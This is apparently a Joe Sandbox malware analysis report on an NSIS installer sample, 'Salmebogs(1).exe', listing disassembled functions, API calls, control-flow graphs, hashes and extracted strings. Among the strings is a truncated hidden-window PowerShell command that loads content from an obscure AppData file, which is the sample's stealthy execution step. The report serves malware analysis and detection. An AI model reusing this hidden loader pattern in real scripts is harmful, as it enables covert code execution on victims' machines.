                                                                        • GetDlgItem.USER32(?,?), ref: 00403CC3
                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CD7
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403CDE
                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403D8C
                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403D96
                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00403DB0
                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E01
                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403EA7
                                                                        • ShowWindow.USER32(00000000,?), ref: 00403EC8
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EDA
                                                                        • EnableWindow.USER32(?,?), ref: 00403EF5
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F0B
                                                                        • EnableMenuItem.USER32(00000000), ref: 00403F12
                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F2A
                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F3D
                                                                        • lstrlenW.KERNEL32(007A1F20,?,007A1F20,007A7A20), ref: 00403F66
                                                                        • SetWindowTextW.USER32(?,007A1F20), ref: 00403F7A
                                                                        • ShowWindow.USER32(?,0000000A), ref: 004040AE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3282139019-0
                                                                        • Opcode ID: 185b5e1c0ba25d101467035dcd0349198d1f462ccd0962e07e58b023e6120319
                                                                        • Instruction ID: 7796c2fd8547987e4759cb33fe346f97dbca58780086dd76f853dd754902a95e
                                                                        • Opcode Fuzzy Hash: 185b5e1c0ba25d101467035dcd0349198d1f462ccd0962e07e58b023e6120319
                                                                        • Instruction Fuzzy Hash: 0AC1BFB2504204EFDB206F61EE45E2B7AA8EB86705F00853EF651B11F1CB3D9851DB5E
                                                                        Function 00403876 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 287 403876-40388e call 406407 290 403890-4038a0 call 405f74 287->290 291 4038a2-4038d9 call 405efa 287->291 299 4038fc-403925 call 403b4c call 405ae9 290->299 295 4038f1-4038f7 lstrcatW 291->295 296 4038db-4038ec call 405efa 291->296 295->299 296->295 305 4039b7-4039bf call 405ae9 299->305 306 40392b-403930 299->306 312 4039c1-4039c8 call 40604f 305->312 313 4039cd-4039f2 LoadImageW 305->313 306->305 307 403936-40395e call 405efa 306->307 307->305 317 403960-403964 307->317 312->313 315 403a73-403a7b call 40140b 313->315 316 4039f4-403a24 RegisterClassW 313->316 330 403a85-403a90 call 403b4c 315->330 331 403a7d-403a80 315->331 318 403b42 316->318 319 403a2a-403a6e SystemParametersInfoW CreateWindowExW 316->319 321 403976-403982 lstrlenW 317->321 322 403966-403973 call 405a0e 317->322 324 403b44-403b4b 318->324 319->315 325 403984-403992 lstrcmpiW 321->325 326 4039aa-4039b2 call 4059e1 call 40602d 321->326 322->321 325->326 329 403994-40399e GetFileAttributesW 325->329 326->305 333 4039a0-4039a2 329->333 334 4039a4-4039a5 call 405a2d 329->334 340 403a96-403ab0 ShowWindow call 406397 330->340 341 403b19-403b1a call 40525f 330->341 331->324 333->326 333->334 334->326 348 403ab2-403ab7 call 406397 340->348 349 403abc-403ace GetClassInfoW 340->349 344 403b1f-403b21 341->344 346 403b23-403b29 344->346 347 403b3b-403b3d call 40140b 344->347 346->331 352 403b2f-403b36 call 40140b 346->352 347->318 348->349 350 403ad0-403ae0 GetClassInfoW RegisterClassW 349->350 351 403ae6-403b09 DialogBoxParamW call 40140b 349->351 350->351 357 403b0e-403b17 call 4037c6 351->357 352->331 357->324
                                                                        APIs
                                                                          • Part of subcall function 00406407: GetModuleHandleA.KERNEL32(?,00000020,?,004032E6,00000009), ref: 00406419
                                                                          • Part of subcall function 00406407: GetProcAddress.KERNEL32(00000000,?), ref: 00406434
                                                                        • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Salmebogs(1).exe",00000000), ref: 004038F7
                                                                        • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,76233420), ref: 00403977
                                                                        • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 0040398A
                                                                        • GetFileAttributesW.KERNEL32(: Completed), ref: 00403995
                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede), ref: 004039DE
                                                                          • Part of subcall function 00405F74: wsprintfW.USER32 ref: 00405F81
                                                                        • RegisterClassW.USER32(007A79C0), ref: 00403A1B
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A33
                                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A68
                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403A9E
                                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403ACA
                                                                        • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403AD7
                                                                        • RegisterClassW.USER32(007A79C0), ref: 00403AE0
                                                                        • DialogBoxParamW.USER32(?,00000000,00403C19,00000000), ref: 00403AFF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: "C:\Users\user\Desktop\Salmebogs(1).exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                        • API String ID: 1975747703-2520745259
                                                                        • Opcode ID: 2aad4ae8f770a3a4c9c0d4813db5772816ca658ce53dfce8c4cc6a4aea9b68c7
                                                                        • Instruction ID: 266f42dc912ac30c3170d4d572d87253d856dcd8cbc4d1b533e3310f3344062b
                                                                        • Opcode Fuzzy Hash: 2aad4ae8f770a3a4c9c0d4813db5772816ca658ce53dfce8c4cc6a4aea9b68c7
                                                                        • Instruction Fuzzy Hash: DA61A270200600AED620AF669D45F2B3A6CEBC5B49F40853FF941B62E2DB7D5901CB6D
                                                                        Function 00402DEE Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 361 402dee-402e3c GetTickCount GetModuleFileNameW call 405c02 364 402e48-402e76 call 40602d call 405a2d call 40602d GetFileSize 361->364 365 402e3e-402e43 361->365 373 402f63-402f71 call 402d8a 364->373 374 402e7c 364->374 366 403020-403024 365->366 380 402f73-402f76 373->380 381 402fc6-402fcb 373->381 376 402e81-402e98 374->376 378 402e9a 376->378 379 402e9c-402ea5 call 40321f 376->379 378->379 386 402eab-402eb2 379->386 387 402fcd-402fd5 call 402d8a 379->387 384 402f78-402f90 call 403235 call 40321f 380->384 385 402f9a-402fc4 GlobalAlloc call 403235 call 403027 380->385 381->366 384->381 408 402f92-402f98 384->408 385->381 412 402fd7-402fe8 385->412 390 402eb4-402ec8 call 405bbd 386->390 391 402f2e-402f32 386->391 387->381 399 402f3c-402f42 390->399 410 402eca-402ed1 390->410 398 402f34-402f3b call 402d8a 391->398 391->399 398->399 403 402f51-402f5b 399->403 404 402f44-402f4e call 4064b8 399->404 403->376 411 402f61 403->411 404->403 408->381 408->385 410->399 414 402ed3-402eda 410->414 411->373 415 402ff0-402ff5 412->415 416 402fea 412->416 414->399 417 402edc-402ee3 414->417 418 402ff6-402ffc 415->418 416->415 417->399 419 402ee5-402eec 417->419 418->418 420 402ffe-403019 SetFilePointer call 405bbd 418->420 419->399 422 402eee-402f0e 419->422 423 40301e 420->423 422->381 424 402f14-402f18 422->424 423->366 425 402f20-402f28 424->425 426 402f1a-402f1e 424->426 425->399 427 402f2a-402f2c 425->427 426->411 426->425 427->399
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00402DFF
                                                                        • GetModuleFileNameW.KERNEL32(00000000,007B6800,00000400,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00402E1B
                                                                          • Part of subcall function 00405C02: GetFileAttributesW.KERNELBASE(00000003,00402E2E,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405C06
                                                                          • Part of subcall function 00405C02: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405C28
                                                                        • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00402E67
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                        • String ID: "C:\Users\user\Desktop\Salmebogs(1).exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                        • API String ID: 4283519449-3234192656
                                                                        • Opcode ID: 2230abfe47367ce911a851d27291f94f72d64689ba699b53d3264e4bd5f6c4f0
                                                                        • Instruction ID: 09a089d5f82a6c40e132a302aa9c698f597429127be3c6a0c4abd29db18ff3c5
                                                                        • Opcode Fuzzy Hash: 2230abfe47367ce911a851d27291f94f72d64689ba699b53d3264e4bd5f6c4f0
                                                                        • Instruction Fuzzy Hash: CE51E971901206ABDB109F64DE89B5E7BB8EF15394F20403BF904B62D1DBBC4D409B5D
                                                                        Function 00401767 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 490 401767-40178c call 402bbf call 405a58 495 401796-4017a8 call 40602d call 4059e1 lstrcatW 490->495 496 40178e-401794 call 40602d 490->496 501 4017ad-4017ae call 4062c1 495->501 496->501 505 4017b3-4017b7 501->505 506 4017b9-4017c3 call 406370 505->506 507 4017ea-4017ed 505->507 514 4017d5-4017e7 506->514 515 4017c5-4017d3 CompareFileTime 506->515 509 4017f5-401811 call 405c02 507->509 510 4017ef-4017f0 call 405bdd 507->510 517 401813-401816 509->517 518 401885-4018ae call 40518c call 403027 509->518 510->509 514->507 515->514 520 401867-401871 call 40518c 517->520 521 401818-401856 call 40602d * 2 call 40604f call 40602d call 405772 517->521 532 4018b0-4018b4 518->532 533 4018b6-4018c2 SetFileTime 518->533 530 40187a-401880 520->530 521->505 553 40185c-40185d 521->553 534 402a55 530->534 532->533 536 4018c8-4018d3 CloseHandle 532->536 533->536 540 402a57-402a5b 534->540 538 4018d9-4018dc 536->538 539 402a4c-402a4f 536->539 542 4018f1-4018f4 call 40604f 538->542 543 4018de-4018ef call 40604f lstrcatW 538->543 539->534 547 4018f9-40228d call 405772 542->547 543->547 547->539 547->540 553->530 555 40185f-401860 553->555 555->520
                                                                        APIs
                                                                        • lstrcatW.KERNEL32(00000000,00000000,powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk,C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede,?,?,00000031), ref: 004017A8
                                                                        • CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk,powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk,00000000,00000000,powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk,C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede,?,?,00000031), ref: 004017CD
                                                                          • Part of subcall function 0040602D: lstrcpynW.KERNEL32(?,?,00000400,0040332A,007A7A20,NSIS Error), ref: 0040603A
                                                                          • Part of subcall function 0040518C: lstrlenW.KERNEL32(Completed,00000000,007953FF,762323A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C4
                                                                          • Part of subcall function 0040518C: lstrlenW.KERNEL32(00403168,Completed,00000000,007953FF,762323A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D4
                                                                          • Part of subcall function 0040518C: lstrcatW.KERNEL32(Completed,00403168,00403168,Completed,00000000,007953FF,762323A0), ref: 004051E7
                                                                          • Part of subcall function 0040518C: SetWindowTextW.USER32(Completed,Completed), ref: 004051F9
                                                                          • Part of subcall function 0040518C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040521F
                                                                          • Part of subcall function 0040518C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405239
                                                                          • Part of subcall function 0040518C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405247
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\sknserklringerne\antilapse.fel$C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede$powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medk
                                                                        • API String ID: 1941528284-1192979168
                                                                        • Opcode ID: a5ea1d74589360650eecc12eae9d64c8bcc31512d10061facb43601c9a82ae87
                                                                        • Instruction ID: b6c518ac9409a037d84d2de051aa7ef8acb95708ad7dc08f543902d4715931a2
                                                                        • Opcode Fuzzy Hash: a5ea1d74589360650eecc12eae9d64c8bcc31512d10061facb43601c9a82ae87
                                                                        • Instruction Fuzzy Hash: 2241A571940515BACF20BFB5CC46DAF7675EF45329B20823BF422B10E2DB3C8A519A6D
                                                                        Function 0040518C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 556 40518c-4051a1 557 4051a7-4051b8 556->557 558 405258-40525c 556->558 559 4051c3-4051cf lstrlenW 557->559 560 4051ba-4051be call 40604f 557->560 562 4051d1-4051e1 lstrlenW 559->562 563 4051ec-4051f0 559->563 560->559 562->558 566 4051e3-4051e7 lstrcatW 562->566 564 4051f2-4051f9 SetWindowTextW 563->564 565 4051ff-405203 563->565 564->565 567 405205-405247 SendMessageW * 3 565->567 568 405249-40524b 565->568 566->563 567->568 568->558 569 40524d-405250 568->569 569->558
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(Completed,00000000,007953FF,762323A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C4
                                                                        • lstrlenW.KERNEL32(00403168,Completed,00000000,007953FF,762323A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D4
                                                                        • lstrcatW.KERNEL32(Completed,00403168,00403168,Completed,00000000,007953FF,762323A0), ref: 004051E7
                                                                        • SetWindowTextW.USER32(Completed,Completed), ref: 004051F9
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040521F
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405239
                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405247
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                        • String ID: Completed
                                                                        • API String ID: 2531174081-3087654605
                                                                        • Opcode ID: baa22e3bb1d4b1fe90a2dc8523cea4daa0ee706f4726e05986a8d1993b39331c
                                                                        • Instruction ID: ba1fee82cce58728351fc00c71800df183ba28672b3cc7c2ac0788bec40afb87
                                                                        • Opcode Fuzzy Hash: baa22e3bb1d4b1fe90a2dc8523cea4daa0ee706f4726e05986a8d1993b39331c
                                                                        • Instruction Fuzzy Hash: F721AF71900558BACB119FA6DD44ACFBFB8EF85310F10807AF904B62A1C7794A40CFA8
                                                                        Function 00406397 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 570 406397-4063b7 GetSystemDirectoryW 571 4063b9 570->571 572 4063bb-4063bd 570->572 571->572 573 4063ce-4063d0 572->573 574 4063bf-4063c8 572->574 576 4063d1-406404 wsprintfW LoadLibraryExW 573->576 574->573 575 4063ca-4063cc 574->575 575->576
                                                                        APIs
                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063AE
                                                                        • wsprintfW.USER32 ref: 004063E9
                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004063FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                        • String ID: %s%S.dll$UXTHEME$\
                                                                        • API String ID: 2200240437-1946221925
                                                                        • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                        • Instruction ID: c9fa99885ad6dc82947e8769e1e813740631d6316ec4b329aa07ca863a8e6543
                                                                        • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                        • Instruction Fuzzy Hash: 6BF0F670510219A7DB10AB64DD0DF9A366CAB00304F10443ABA46F20E0EFB8DA79CBE8
                                                                        Function 00403027 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                                        Download Yara Rule

